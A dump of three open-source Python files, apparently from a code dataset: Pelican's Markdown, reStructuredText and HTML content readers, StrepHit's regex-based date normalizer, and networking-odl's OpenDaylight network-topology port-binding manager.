from pelican.utils import SafeDatetime, escape_html, get_date, pelican_open, \
posixize_path
try:
from markdown import Markdown
except ImportError:
Markdown = False # NOQA
# Metadata processors have no way to discard an unwanted value, so we have
# them return this value instead to signal that it should be discarded later.
# This means that _filter_discardable_metadata() must be called on processed
# metadata dicts before use, to remove the items with the special value.
_DISCARD = object()
METADATA_PROCESSORS = {
'tags': lambda x, y: ([
Tag(tag, y)
for tag in ensure_metadata_list(x)
] or _DISCARD),
'date': lambda x, y: get_date(x.replace('_', ' ')),
'modified': lambda x, y: get_date(x),
'status': lambda x, y: x.strip() or _DISCARD,
'category': lambda x, y: _process_if_nonempty(Category, x, y),
'author': lambda x, y: _process_if_nonempty(Author, x, y),
'authors': lambda x, y: ([
Author(author, y)
for author in ensure_metadata_list(x)
] or _DISCARD),
'slug': lambda x, y: x.strip() or _DISCARD,
}
logger = logging.getLogger(__name__)
def ensure_metadata_list(text):
"""Canonicalize the format of a list of authors or tags. This works
the same way as Docutils' "authors" field: if it's already a list,
those boundaries are preserved; otherwise, it must be a string;
if the string contains semicolons, it is split on semicolons;
otherwise, it is split on commas. This allows you to write
author lists in either "Jane Doe, John Doe" or "Doe, Jane; Doe, John"
format.
Regardless, all list items undergo .strip() before returning, and
empty items are discarded.
"""
if isinstance(text, six.text_type):
if ';' in text:
text = text.split(';')
else:
text = text.split(',')
return list(OrderedDict.fromkeys(
[v for v in (w.strip() for w in text) if v]
))
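# Illustrative sketch, not part of the original pelican source: both accepted
# author/tag list spellings normalize to the same kind of list, and duplicates
# are dropped while preserving order. The values are invented for the example.
#
# >>> ensure_metadata_list('Doe, Jane; Doe, John')
# ['Doe, Jane', 'Doe, John']
# >>> ensure_metadata_list('pelican, python, pelican')
# ['pelican', 'python']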
def _process_if_nonempty(processor, name, settings):
"""Removes extra whitespace from name and applies a metadata processor.
If name is empty or all whitespace, returns _DISCARD instead.
"""
name = name.strip()
return processor(name, settings) if name else _DISCARD
def _filter_discardable_metadata(metadata):
"""Return a copy of a dict, minus any items marked as discardable."""
return {name: val for name, val in metadata.items() if val is not _DISCARD}
class BaseReader(object):
"""Base class to read files.
This class is used to process static files, and it can be inherited for
other types of file. A Reader class must have the following attributes:
- enabled: (boolean) tell if the Reader class is enabled. It
generally depends on the import of some dependency.
- file_extensions: a list of file extensions that the Reader will process.
- extensions: a list of extensions to use in the reader (typical use is
Markdown).
"""
enabled = True
file_extensions = ['static']
extensions = None
def __init__(self, settings):
self.settings = settings
def process_metadata(self, name, value):
if name in METADATA_PROCESSORS:
return METADATA_PROCESSORS[name](value, self.settings)
return value
def read(self, source_path):
"No-op parser"
content = None
metadata = {}
return content, metadata
class _FieldBodyTranslator(HTMLTranslator):
def __init__(self, document):
HTMLTranslator.__init__(self, document)
self.compact_p = None
def astext(self):
return ''.join(self.body)
def visit_field_body(self, node):
pass
def depart_field_body(self, node):
pass
def render_node_to_html(document, node, field_body_translator_class):
visitor = field_body_translator_class(document)
node.walkabout(visitor)
return visitor.astext()
class PelicanHTMLWriter(Writer):
def __init__(self):
Writer.__init__(self)
self.translator_class = PelicanHTMLTranslator
class PelicanHTMLTranslator(HTMLTranslator):
def visit_abbreviation(self, node):
attrs = {}
if node.hasattr('explanation'):
attrs['title'] = node['explanation']
self.body.append(self.starttag(node, 'abbr', '', **attrs))
def depart_abbreviation(self, node):
self.body.append('</abbr>')
def visit_image(self, node):
# set an empty alt if alt is not specified
# avoids that alt is taken from src
node['alt'] = node.get('alt', '')
return HTMLTranslator.visit_image(self, node)
class RstReader(BaseReader):
"""Reader for reStructuredText files
By default the output HTML is written using
docutils.writers.html4css1.Writer and translated using a subclass of
docutils.writers.html4css1.HTMLTranslator. If you want to override it with
your own writer/translator (e.g. a HTML5-based one), pass your classes to
these two attributes. Look in the source code for details.
writer_class Used for writing contents
field_body_translator_class Used for translating metadata such
as article summary
"""
enabled = bool(docutils)
file_extensions = ['rst']
writer_class = PelicanHTMLWriter
field_body_translator_class = _FieldBodyTranslator
class FileInput(docutils.io.FileInput):
"""Patch docutils.io.FileInput to remove "U" mode in py3.
Universal newlines is enabled by default and "U" mode is deprecated
in py3.
"""
def __init__(self, *args, **kwargs):
if six.PY3:
kwargs['mode'] = kwargs.get('mode', 'r').replace('U', '')
docutils.io.FileInput.__init__(self, *args, **kwargs)
def __init__(self, *args, **kwargs):
super(RstReader, self).__init__(*args, **kwargs)
def _parse_metadata(self, document):
"""Return the dict containing document metadata"""
formatted_fields = self.settings['FORMATTED_FIELDS']
output = {}
for docinfo in document.traverse(docutils.nodes.docinfo):
for element in docinfo.children:
if element.tagname == 'field': # custom fields (e.g. summary)
name_elem, body_elem = element.children
name = name_elem.astext()
if name in formatted_fields:
value = render_node_to_html(
document, body_elem,
self.field_body_translator_class)
else:
value = body_elem.astext()
elif element.tagname == 'authors': # author list
name = element.tagname
value = [element.astext() for element in element.children]
else: # standard fields (e.g. address)
name = element.tagname
value = element.astext()
name = name.lower()
output[name] = self.process_metadata(name, value)
return output
def _get_publisher(self, source_path):
extra_params = {'initial_header_level': '2',
'syntax_highlight': 'short',
'input_encoding': 'utf-8',
'exit_status_level': 2,
'embed_stylesheet': False}
user_params = self.settings.get('DOCUTILS_SETTINGS')
if user_params:
extra_params.update(user_params)
pub = docutils.core.Publisher(
writer=self.writer_class(),
source_class=self.FileInput,
destination_class=docutils.io.StringOutput)
pub.set_components('standalone', 'restructuredtext', 'html')
pub.process_programmatic_settings(None, extra_params, None)
pub.set_source(source_path=source_path)
pub.publish(enable_exit_status=True)
return pub
def read(self, source_path):
"""Parses restructured text"""
pub = self._get_publisher(source_path)
parts = pub.writer.parts
content = parts.get('body')
metadata = self._parse_metadata(pub.document)
metadata.setdefault('title', parts.get('title'))
return content, metadata
class MarkdownReader(BaseReader):
"""Reader for Markdown files"""
enabled = bool(Markdown)
file_extensions = ['md', 'markdown', 'mkd', 'mdown']
def __init__(self, *args, **kwargs):
super(MarkdownReader, self).__init__(*args, **kwargs)
settings = self.settings['MARKDOWN']
settings.setdefault('extension_configs', {})
settings.setdefault('extensions', [])
for extension in settings['extension_configs'].keys():
if extension not in settings['extensions']:
settings['extensions'].append(extension)
if 'markdown.extensions.meta' not in settings['extensions']:
settings['extensions'].append('markdown.extensions.meta')
self._source_path = None
def _parse_metadata(self, meta):
"""Return the dict containing document metadata"""
formatted_fields = self.settings['FORMATTED_FIELDS']
output = {}
for name, value in meta.items():
name = name.lower()
if name in formatted_fields:
# formatted metadata is special case and join all list values
formatted_values = "\n".join(value)
# reset the markdown instance to clear any state
self._md.reset()
formatted = self._md.convert(formatted_values)
output[name] = self.process_metadata(name, formatted)
elif name in METADATA_PROCESSORS:
if len(value) > 1:
logger.warning(
'Duplicate definition of `%s` '
'for %s. Using first one.',
name, self._source_path)
output[name] = self.process_metadata(name, value[0])
elif len(value) > 1:
# handle list metadata as list of string
output[name] = self.process_metadata(name, value)
else:
# otherwise, handle metadata as single string
output[name] = self.process_metadata(name, value[0])
return output
def read(self, source_path):
"""Parse content and metadata of markdown files"""
self._source_path = source_path
self._md = Markdown(**self.settings['MARKDOWN'])
with pelican_open(source_path) as text:
content = self._md.convert(text)
if hasattr(self._md, 'Meta'):
metadata = self._parse_metadata(self._md.Meta)
else:
metadata = {}
return content, metadata
class HTMLReader(BaseReader):
"""Parses HTML files as input, looking for meta, title, and body tags"""
file_extensions = ['htm', 'html']
enabled = True
class _HTMLParser(HTMLParser):
def __init__(self, settings, filename):
try:
# Python 3.4+
HTMLParser.__init__(self, convert_charrefs=False)
except TypeError:
HTMLParser.__init__(self)
self.body = ''
self.metadata = {}
self.settings = settings
self._data_buffer = ''
self._filename = filename
self._in_top_level = True
self._in_head = False
self._in_title = False
self._in_body = False
self._in_tags = False
def handle_starttag(self, tag, attrs):
if tag == 'head' and self._in_top_level:
self._in_top_level = False
self._in_head = True
elif tag == 'title' and self._in_head:
self._in_title = True
self._data_buffer = ''
elif tag == 'body' and self._in_top_level:
self._in_top_level = False
self._in_body = True
self._data_buffer = ''
elif tag == 'meta' and self._in_head:
self._handle_meta_tag(attrs)
elif self._in_body:
self._data_buffer += self.build_tag(tag, attrs, False)
def handle_endtag(self, tag):
if tag == 'head':
if self._in_head:
self._in_head = False
self._in_top_level = True
elif tag == 'title':
self._in_title = False
self.metadata['title'] = self._data_buffer
elif tag == 'body':
self.body = self._data_buffer
self._in_body = False
self._in_top_level = True
elif self._in_body:
self._data_buffer += '</{}>'.format(escape_html(tag))
def handle_startendtag(self, tag, attrs):
if tag == 'meta' and self._in_head:
self._handle_meta_tag(attrs)
if self._in_body:
self._data_buffer += self.build_tag(tag, attrs, True)
def handle_comment(self, data):
self._data_buffer += '<!--{}-->'.format(data)
def handle_data(self, data):
self._data_buffer += data
def handle_entityref(self, data):
self._data_buffer += '&{};'.format(data)
def handle_charref(self, data):
self._data_buffer += '&#{};'.format(data)
def build_tag(self, tag, attrs, close_tag):
result = '<{}'.format(escape_html(tag))
for k, v in attrs:
result += ' ' + escape_html(k)
if v is not None:
# If the attribute value contains a double quote, surround
# with single quotes, otherwise use double quotes.
if '"' in v:
result += "='{}'".format(escape_html(v, quote=False))
else:
result += '="{}"'.format(escape_html(v, quote=False))
if close_tag:
return result + ' />'
return result + '>'
def _handle_meta_tag(self, attrs):
name = self._attr_value(attrs, 'name')
if name is None:
attr_list = ['{}="{}"'.format(k, v) for k, v in attrs]
attr_serialized = ', '.join(attr_list)
logger.warning("Meta tag in file %s does not have a 'name' "
"attribute, skipping. Attributes: %s",
self._filename, attr_serialized)
return
name = name.lower()
contents = self._attr_value(attrs, 'content', '')
if not contents:
contents = self._attr_value(attrs, 'contents', '')
if contents:
logger.warning(
"Meta tag attribute 'contents' used in file %s, should"
" be changed to 'content'",
self._filename,
extra={'limit_msg': "Other files have meta tag "
"attribute 'contents' that should "
"be changed to 'content'"})
if name == 'keywords':
name = 'tags'
self.metadata[name] = contents
@classmethod
def _attr_value(cls, attrs, name, default=None):
return next((x[1] for x in attrs if x[0] == name), default)
def read(self, filename):
"""Parse content and metadata of HTML files"""
with pelican_open(filename) as content:
parser = self._HTMLParser(self.settings, filename)
parser.feed(content)
parser.close()
metadata = {}
for k in parser.metadata:
metadata[k] = self.process_metadata(k, parser.metadata[k])
return parser.body, metadata
class Readers(FileStampDataCacher):
"""Interface for all readers.
This class contains a mapping of file extensions / Reader classes, to know
which Reader class must be used to read a file (based on its extension).
This is customizable both with the 'READERS' setting, and with the
    'readers_init' signal for plugins.
"""
def __init__(self, settings=None, cache_name=''):
self.settings = settings or {}
self.readers = {}
self.reader_classes = {}
for cls in [BaseReader] + BaseReader.__subclasses__():
if not cls.enabled:
logger.debug('Missing dependencies for %s',
', '.join(cls.file_extensions))
continue
for ext in cls.file_extensions:
self.reader_classes[ext] = cls
if self.settings['READERS']:
self.reader_classes.update(self.settings['READERS'])
signals.readers_init.send(self)
for fmt, reader_class in self.reader_classes.items():
if not reader_class:
continue
self.readers[fmt] = reader_class(self.settings)
# set up caching
cache_this_level = (cache_name != '' and
self.settings['CONTENT_CACHING_LAYER'] == 'reader')
caching_policy = cache_this_level and self.settings['CACHE_CONTENT']
load_policy = cache_this_level and self.settings['LOAD_CONTENT_CACHE']
super(Readers, self).__init__(settings, cache_name,
caching_policy, load_policy,
)
@property
def extensions(self):
return self.readers.keys()
def read_file(self, base_path, path, content_class=Page, fmt=None,
context=None, preread_signal=None, preread_sender=None,
context_signal=None, context_sender=None):
"""Return a content object parsed with the given format."""
path = os.path.abspath(os.path.join(base_path, path))
source_path = posixize_path(os.path.relpath(path, base_path))
logger.debug(
'Read file %s -> %s',
source_path, content_class.__name__)
if not fmt:
_, ext = os.path.splitext(os.path.basename(path))
fmt = ext[1:]
if fmt not in self.readers:
raise TypeError(
'Pelican does not know how to parse %s', path)
if preread_signal:
logger.debug(
'Signal %s.send(%s)',
preread_signal.name, preread_sender)
preread_signal.send(preread_sender)
reader = self.readers[fmt]
metadata = _filter_discardable_metadata(default_metadata(
settings=self.settings, process=reader.process_metadata))
metadata.update(path_metadata(
full_path=path, source_path=source_path,
settings=self.settings))
metadata.update(_filter_discardable_metadata(parse_path_metadata(
source_path=source_path, settings=self.settings,
process=reader.process_metadata)))
reader_name = reader.__class__.__name__
metadata['reader'] = reader_name.replace('Reader', '').lower()
content, reader_metadata = self.get_cached_data(path, (None, None))
if content is None:
content, reader_metadata = reader.read(path)
self.cache_data(path, (content, reader_metadata))
metadata.update(_filter_discardable_metadata(reader_metadata))
if content:
# find images with empty alt
find_empty_alt(content, path)
            # optionally run the content through typogrify if enabled
if self.settings['TYPOGRIFY']:
from typogrify.filters import typogrify
import smartypants
# Tell `smartypants` to also replace " HTML entities with
# smart quotes. This is necessary because Docutils has already
# replaced double quotes with said entities by the time we run
# this filter.
smartypants.Attr.default |= smartypants.Attr.w
def typogrify_wrapper(text):
"""Ensures ignore_tags feature is backward compatible"""
try:
return typogrify(
text,
self.settings['TYPOGRIFY_IGNORE_TAGS'])
except TypeError:
return typogrify(text)
if content:
content = typogrify_wrapper(content)
if 'title' in metadata:
metadata['title'] = typogrify_wrapper(metadata['title'])
if 'summary' in metadata:
metadata['summary'] = typogrify_wrapper(metadata['summary'])
if context_signal:
logger.debug(
'Signal %s.send(%s, <metadata>)',
context_signal.name,
context_sender)
context_signal.send(context_sender, metadata=metadata)
return content_class(content=content, metadata=metadata,
settings=self.settings, source_path=path,
context=context)
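# Illustrative usage sketch, not part of the original pelican source: a call
# like the ones pelican's generators make. The paths and the fully populated
# settings object (with READERS, cache and content settings) are assumptions
# made for the example.
#
#   readers = Readers(settings=pelican_settings)
#   page = readers.read_file(base_path='/site/content',
#                            path='articles/first-post.md',
#                            content_class=Page)
#   # page.content holds the rendered HTML; the parsed metadata is attached
#   # to the object as attributes (e.g. title, date, tags).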
def find_empty_alt(content, path):
"""Find images with empty alt
Create warnings for all images with empty alt (up to a certain number),
as they are really likely to be accessibility flaws.
"""
imgs = re.compile(r"""
(?:
# src before alt
<img
[^\>]*
src=(['"])(.*?)\1
[^\>]*
alt=(['"])\3
)|(?:
# alt before src
<img
[^\>]*
alt=(['"])\4
[^\>]*
src=(['"])(.*?)\5
)
""", re.X)
for match in re.findall(imgs, content):
logger.warning(
'Empty alt attribute for image %s in %s',
os.path.basename(match[1] + match[5]), path,
extra={'limit_msg': 'Other images have empty alt attributes'})
def default_metadata(settings=None, process=None):
metadata = {}
if settings:
for name, value in dict(settings.get('DEFAULT_METADATA', {})).items():
if process:
value = process(name, value)
metadata[name] = value
if 'DEFAULT_CATEGORY' in settings:
value = settings['DEFAULT_CATEGORY']
if process:
value = process('category', value)
metadata['category'] = value
if settings.get('DEFAULT_DATE', None) and \
settings['DEFAULT_DATE'] != 'fs':
if isinstance(settings['DEFAULT_DATE'], six.string_types):
metadata['date'] = get_date(settings['DEFAULT_DATE'])
else:
metadata['date'] = SafeDatetime(*settings['DEFAULT_DATE'])
return metadata
def path_metadata(full_path, source_path, settings=None):
metadata = {}
if settings:
if settings.get('DEFAULT_DATE', None) == 'fs':
metadata['date'] = SafeDatetime.fromtimestamp(
os.stat(full_path).st_mtime)
metadata.update(settings.get('EXTRA_PATH_METADATA', {}).get(
source_path, {}))
return metadata
def parse_path_metadata(source_path, settings=None, process=None):
r"""Extract a metadata dictionary from a file's path
>>> import pprint
>>> settings = {
... 'FILENAME_METADATA': r'(?P<slug>[^.]*).*',
... 'PATH_METADATA':
... r'(?P<category>[^/]*)/(?P<date>\d{4}-\d{2}-\d{2})/.*',
... }
>>> reader = BaseReader(settings=settings)
>>> metadata = parse_path_metadata(
... source_path='my-cat/2013-01-01/my-slug.html',
... settings=settings,
... process=reader.process_metadata)
>>> pprint.pprint(metadata) # doctest: +ELLIPSIS
{'category': <pelican.urlwrappers.Category object at ...>,
'date': SafeDatetime(2013, 1, 1, 0, 0),
'slug': 'my-slug'}
"""
metadata = {}
dirname, basename = os.path.split(source_path)
base, ext = os.path.splitext(basename)
subdir = os.path.basename(dirname)
if settings:
checks = []
for key, data in [('FILENAME_METADATA', base),
('PATH_METADATA', source_path)]:
checks.append((settings.get(key, None), data))
if settings.get('USE_FOLDER_AS_CATEGORY', None):
checks.append(('(?P<category>.*)', subdir))
for regexp, data in checks:
if regexp and data:
match = re.match(regexp, data)
if match:
# .items() for py3k compat.
for k, v in match.groupdict().items():
k = k.lower() # metadata must be lowercase
if v is not None and k not in metadata:
if process:
v = process(k, v)
metadata[k] = v
return metadata
| agpl-3.0 | 7,005,900,722,206,514,000 | 35.349929 | 79 | 0.559678 | false |
Wikidata/StrepHit | strephit/commons/date_normalizer.py | 1 | 7746 | from __future__ import absolute_import
import yaml
import re
import os
import logging
logger = logging.getLogger(__name__)
class DateNormalizer(object):
"""
    finds matches in text strings using regular expressions and transforms them
according to a pattern transformation expression evaluated on the match
    the specifications are given in yaml format and allow defining meta functions
and meta variables as well as the pattern and transformation rules themselves.
meta variables will be placed inside patterns which use them in order to
make writing patterns easier. meta variables will be available to use from
inside the meta functions too as a dictionary named meta_vars
a pattern transformation expression is an expression which will be evaluated
if the corresponding regular expression matches. the pattern transformation
will have access to all the meta functions and meta variables defined and
to a variable named 'match' containing the regex match found
"""
def __init__(self, language=None, specs=None):
assert language or specs, 'please specify either one of the pre-set ' \
'languages or provide a custom rule set'
if specs is None:
path = os.path.join(os.path.dirname(__file__), 'resources',
'normalization_rules_%s.yml' % language)
with open(path) as f:
specs = yaml.load(f)
self._meta_init(specs)
basic_r = {name: pattern for name, pattern in self.meta_vars.iteritems()}
self.regexes = {}
for category, regexes in specs.iteritems():
regexes = sum((x.items() for x in regexes), [])
self.regexes[category] = [(re.compile(pattern.format(**basic_r)
.replace(' ', '\\s*'),
re.IGNORECASE), result)
for pattern, result in regexes]
def _meta_init(self, specs):
""" Reads the meta variables and the meta functions from the specification
:param dict specs: The specifications loaded from the file
:return: None
"""
# read meta variables and perform substitutions
self.meta_vars = {}
if '__meta_vars__' in specs:
for definition in specs.pop('__meta_vars__'):
var, value = definition.items()[0]
if isinstance(value, basestring):
self.meta_vars[var] = value.format(**self.meta_vars)
elif isinstance(value, dict):
self.meta_vars[var] = {
k: v.format(**self.meta_vars) for k, v in value.iteritems()
}
# compile meta functions in a dictionary
self.meta_funcs = {}
if '__meta_funcs__' in specs:
for f in specs.pop('__meta_funcs__'):
exec f in self.meta_funcs
# make meta variables available to the meta functions just defined
self.meta_funcs['__builtins__']['meta_vars'] = self.meta_vars
self.globals = self.meta_funcs
self.globals.update(self.meta_vars)
def normalize_one(self, expression, conflict='longest'):
""" Find the matching part in the given expression
:param str expression: The expression in which to search the match
:param str conflict: Whether to return the first match found or scan
through all the provided regular expressions and return the longest
or shortest part of the string matched by a regular expression.
Note that the match will always be the first one found in the string,
this parameter tells how to resolve conflicts when there is more than
            one regular expression that returns a match. When multiple matches
            have the same length, the first one found wins.
Allowed values are `first`, `longest` and `shortest`
:return: Tuple with (start, end), category, result
:rtype: tuple
Sample usage:
>>> from strephit.commons.date_normalizer import DateNormalizer
>>> DateNormalizer('en').normalize_one('Today is the 1st of June, 2016')
((13, 30), 'Time', {'month': 6, 'day': 1, 'year': 2016})
"""
best_match = None
expression = expression.lower()
for category, regexes in self.regexes.iteritems():
for regex, transform in regexes:
match = regex.search(expression)
if not match:
continue
elif conflict == 'first':
return self._process_match(category, transform, match, 0)
elif best_match is None or \
conflict == 'longest' and match.end() - match.start() > best_match[1] or \
conflict == 'shortest' and match.end() - match.start() < best_match[1]:
best_match = match, match.end() - match.start(), category, transform
if best_match is None:
return (-1, -1), None, None
else:
match, _, category, transform = best_match
return self._process_match(category, transform, match, 0)
def normalize_many(self, expression):
""" Find all the matching entities in the given expression expression
:param str expression: The expression in which to look for
:return: Generator of tuples (start, end), category, result
Sample usage:
>>> from pprint import pprint
>>> from strephit.commons.date_normalizer import DateNormalizer
>>> pprint(list(DateNormalizer('en').normalize_many('I was born on April 18th, '
... 'and today is April 18th, 2016!')))
[((14, 24), 'Time', {'day': 18, 'month': 4}),
((39, 55), 'Time', {'day': 18, 'month': 4, 'year': 2016})]
"""
# start matching from here, and move forward as new matches
# are found so to avoid overlapping matches and return
# the correct offset inside the original sentence
position = 0
expression = expression.lower()
for category, regexes in self.regexes.iteritems():
for regex, transform in regexes:
end = 0
for match in regex.finditer(expression[position:]):
yield self._process_match(category, transform, match, position)
end = max(end, match.end())
position += end
def _process_match(self, category, transform, match, first_position):
result = eval(transform, self.globals, {'match': match})
start, end = match.span()
return (first_position + start, first_position + end), category, result
NORMALIZERS = {}
def normalize_numerical_fes(language, text):
""" Normalize numerical FEs in a sentence
"""
if language not in NORMALIZERS:
NORMALIZERS[language] = DateNormalizer(language)
normalizer = NORMALIZERS[language]
logger.debug('labeling and normalizing numerical FEs of language %s...', language)
count = 0
for (start, end), tag, norm in normalizer.normalize_many(text):
chunk = text[start:end]
logger.debug('Chunk [%s] normalized into [%s], tagged as [%s]' % (chunk, norm, tag))
# All numerical FEs are extra ones and their values are literals
fe = {
'fe': tag,
'chunk': chunk,
'type': 'extra',
'literal': norm,
'score': 1.0
}
count += 1
yield fe
logger.debug('found %d numerical FEs into "%s"', count, text)
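# --- Illustrative usage (a sketch, not part of the original module) ---
# Typical call pattern for the generator above; the sentence is an arbitrary
# example mirroring the normalize_one() docstring, and the exact offsets and
# dict ordering may differ at runtime.
# >>> for fe in normalize_numerical_fes('en', 'Today is the 1st of June, 2016'):
# ...     print fe['fe'], fe['chunk'], fe['literal']
# e.g. -> Time 1st of June, 2016 {'month': 6, 'day': 1, 'year': 2016}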
| gpl-3.0 | 4,360,993,509,104,244,700 | 41.097826 | 98 | 0.590627 | false |
FedericoRessi/networking-odl | networking_odl/ml2/network_topology.py | 1 | 12691 | # Copyright (c) 2015-2016 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import importlib
import logging
import six
from six.moves.urllib import parse
from neutron.extensions import portbindings
from oslo_log import log
from oslo_serialization import jsonutils
from networking_odl.common import cache
from networking_odl.common import client
from networking_odl.common import utils
from networking_odl.common._i18n import _LI, _LW, _LE
LOG = log.getLogger(__name__)
class NetworkTopologyManager(object):
    # the first valid vif type will be chosen following the order
# on this list. This list can be modified to adapt to user preferences.
valid_vif_types = [
portbindings.VIF_TYPE_VHOST_USER, portbindings.VIF_TYPE_OVS]
# List of class names of registered implementations of interface
# NetworkTopologyParser
network_topology_parsers = [
'networking_odl.ml2.ovsdb_topology.OvsdbNetworkTopologyParser']
def __init__(self, vif_details=None, client=None):
# Details for binding port
self._vif_details = vif_details or {}
# Rest client used for getting network topology from ODL
self._client = client or NetworkTopologyClient.create_client()
# Table of NetworkTopologyElement
self._elements_by_ip = cache.Cache(
self._fetch_and_parse_network_topology)
# Parsers used for processing network topology
self._parsers = list(self._create_parsers())
def bind_port(self, port_context):
"""Set binding for a valid segment
"""
host_name = port_context.host
elements = list()
try:
            # Append to an empty list to add as many elements as possible
            # in case it raises an exception
elements.extend(self._fetch_elements_by_host(host_name))
except Exception:
LOG.exception(
_LE('Error fetching elements for host %(host_name)r.'),
{'host_name': host_name}, exc_info=1)
if not elements:
            # If it wasn't able to find any network topology element for the
            # given host, it uses the legacy OVS one, keeping the old
            # behaviour
LOG.warning(
_LW('Using legacy OVS network topology element for port '
'binding for host: %(host_name)r.'),
{'host_name': host_name})
# Imported here to avoid cyclic module dependencies
from networking_odl.ml2 import ovsdb_topology
elements = [ovsdb_topology.OvsdbNetworkTopologyElement()]
        # TODO(Federico Ressi): when there are multiple candidate virtual
        # switch instances for the same host, one of them has to be chosen for
        # binding the port. As there is no known way to perform this selection,
        # it picks a VIF type that is valid for all the switches that have
        # been found. This has to be improved.
for vif_type in self.valid_vif_types:
vif_type_is_valid_for_all = True
for element in elements:
if vif_type not in element.valid_vif_types:
# it is invalid for at least one element: discard it
vif_type_is_valid_for_all = False
break
if vif_type_is_valid_for_all:
# This is the best VIF type valid for all elements
LOG.debug(
"Found VIF type %(vif_type)r valid for all network "
"topology elements for host %(host_name)r.",
{'vif_type': vif_type, 'host_name': host_name})
for element in elements:
                # It assumes that any element could be good for the given host.
                # In most cases I expect exactly one element for every
                # compute host
try:
return element.bind_port(
port_context, vif_type, self._vif_details)
except Exception:
LOG.exception(
_LE('Network topology element has failed binding '
'port:\n%(element)s'),
{'element': element.to_json()})
LOG.error(
_LE('Unable to bind port element for given host and valid VIF '
'types:\n'
'\thostname: %(host_name)s\n'
'\tvalid VIF types: %(valid_vif_types)s'),
{'host_name': host_name,
'valid_vif_types': ', '.join(self.valid_vif_types)})
        # TODO(Federico Ressi): should I raise an exception here?
def _create_parsers(self):
for parser_name in self.network_topology_parsers:
try:
yield NetworkTopologyParser.create_parser(parser_name)
except Exception:
LOG.exception(
_LE('Error initializing topology parser: %(parser_name)r'),
{'parser_name': parser_name})
def _fetch_elements_by_host(self, host_name, cache_timeout=60.0):
'''Yields all network topology elements referring to given host name
'''
host_addresses = [host_name]
try:
            # It uses both the compute host name and its known IP addresses to
            # recognize topology elements valid for the given compute host
ip_addresses = utils.get_addresses_by_name(host_name)
except Exception:
ip_addresses = []
LOG.exception(
_LE('Unable to resolve IP addresses for host %(host_name)r'),
{'host_name': host_name})
else:
host_addresses.extend(ip_addresses)
yield_elements = set()
try:
for _, element in self._elements_by_ip.fetch_all(
host_addresses, cache_timeout):
# yields every element only once
if element not in yield_elements:
yield_elements.add(element)
yield element
except cache.CacheFetchError as error:
            # This error is expected in most cases because typically not
            # all host_addresses map to a network topology element.
if yield_elements:
                # As we need only one element for every host, we ignore the
                # case in which other host addresses didn't map to any host
LOG.debug(
'Host addresses not found in networking topology: %s',
', '.join(error.missing_keys))
else:
LOG.exception(
_LE('No such network topology elements for given host '
'%(host_name)r and given IPs: %(ip_addresses)s.'),
{'host_name': host_name,
'ip_addresses': ", ".join(ip_addresses)})
error.reraise_cause()
def _fetch_and_parse_network_topology(self, addresses):
        # The cache calls this method to fetch new elements when at least one
# of the addresses is not in the cache or it has expired.
# pylint: disable=unused-argument
LOG.info(_LI('Fetch network topology from ODL.'))
response = self._client.get()
response.raise_for_status()
network_topology = response.json()
if LOG.isEnabledFor(logging.DEBUG):
topology_str = jsonutils.dumps(
network_topology, sort_keys=True, indent=4,
separators=(',', ': '))
LOG.debug("Got network topology:\n%s", topology_str)
at_least_one_element_for_asked_addresses = False
for parser in self._parsers:
try:
for element in parser.parse_network_topology(network_topology):
if not isinstance(element, NetworkTopologyElement):
raise TypeError(
"Yield element doesn't implement interface "
"'NetworkTopologyElement': {!r}".format(element))
# the same element can be known by more host addresses
for host_address in element.host_addresses:
if host_address in addresses:
at_least_one_element_for_asked_addresses = True
yield host_address, element
except Exception:
LOG.exception(
_LE("Parser %(parser)r failed to parse network topology."),
{'parser': parser})
if not at_least_one_element_for_asked_addresses:
# this will mark entries for given addresses as failed to allow
            # calling this method again as soon as it is requested and avoid
# waiting for cache expiration
raise ValueError(
'No such topology element for given host addresses: {}'.format(
', '.join(addresses)))
@six.add_metaclass(abc.ABCMeta)
class NetworkTopologyParser(object):
@classmethod
def create_parser(cls, parser_class_name):
'''Creates a 'NetworkTopologyParser' of given class name.
'''
module_name, class_name = parser_class_name.rsplit('.', 1)
module = importlib.import_module(module_name)
clss = getattr(module, class_name)
if not issubclass(clss, cls):
raise TypeError(
"Class {class_name!r} of module {module_name!r} doesn't "
"implement 'NetworkTopologyParser' interface.".format(
class_name=class_name, module_name=module_name))
return clss()
@abc.abstractmethod
def parse_network_topology(self, network_topology):
'''Parses OpenDaylight network topology
Yields all network topology elements implementing
'NetworkTopologyElement' interface found in given network topology.
'''
@six.add_metaclass(abc.ABCMeta)
class NetworkTopologyElement(object):
@abc.abstractproperty
def host_addresses(self):
'''List of known host addresses of a single compute host
Either host names and ip addresses are valid.
Neutron host controller must know at least one of these compute host
names or ip addresses to find this element.
'''
@abc.abstractproperty
def valid_vif_types(self):
'''Returns a tuple listing VIF types supported by the compute node
'''
@abc.abstractmethod
def bind_port(self, port_context, vif_type, vif_details):
        '''Bind port context using given vif type and vif details
This method is expected to search for a valid segment and then
call following method:
from neutron.common import constants
from neutron.plugins.ml2 import driver_api
port_context.set_binding(
valid_segment[driver_api.ID], vif_type, vif_details,
status=constants.PORT_STATUS_ACTIVE)
'''
def to_dict(self):
cls = type(self)
return {
'class': cls.__module__ + '.' + cls.__name__,
'host_addresses': list(self.host_addresses),
'valid_vif_types': list(self.valid_vif_types)}
def to_json(self):
return jsonutils.dumps(
self.to_dict(), sort_keys=True, indent=4, separators=(',', ': '))
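# --- Illustrative sketch (not part of the original module) ---
# A minimal NetworkTopologyElement for a single host, showing how the
# interface documented above fits together. The hostname handling, the fixed
# OVS VIF type and the use of port_context.segments_to_bind are simplifying
# assumptions for demonstration only.
class ExampleSingleHostElement(NetworkTopologyElement):
    def __init__(self, hostname):
        self._hostname = hostname
    @property
    def host_addresses(self):
        return [self._hostname]
    @property
    def valid_vif_types(self):
        return [portbindings.VIF_TYPE_OVS]
    def bind_port(self, port_context, vif_type, vif_details):
        # Follows the pattern given in the abstract method docstring: take a
        # candidate segment and bind it with the given VIF type and details.
        from neutron.common import constants
        from neutron.plugins.ml2 import driver_api
        segment = port_context.segments_to_bind[0]
        port_context.set_binding(
            segment[driver_api.ID], vif_type, vif_details,
            status=constants.PORT_STATUS_ACTIVE)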
